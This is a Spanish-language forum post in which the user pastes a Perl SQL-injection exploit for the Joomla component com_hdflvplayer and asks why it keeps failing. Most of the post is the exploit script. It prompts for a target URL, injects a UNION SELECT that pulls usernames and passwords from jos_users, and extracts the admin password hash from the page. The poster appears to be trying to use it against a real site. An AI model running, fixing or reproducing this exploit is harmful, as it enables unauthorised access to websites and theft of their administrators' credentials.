Perdon me olvide de postear esto, que es el exploit en perl:

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n

• CIHUY Admin Password Nya GAN
• : $1\n\n";

}
else{print "\n

• Exploit GAGAL GAN !
• \n";

}


Ejecute el exploit, pero el problema es el siguiente, va siempre al else final, osea me muestra :

• Exploit GAGAL GAN !

Entonces para llegar a esa url que puse en mi post principal, remplace las variables por lo que es cada una. Ejemplo $tukulesto="jos_users"; puse directamente en la direccion que crea jos_users y asi sucesivamente.

Sinceramente no puedo entender cual sea el problema... gracias..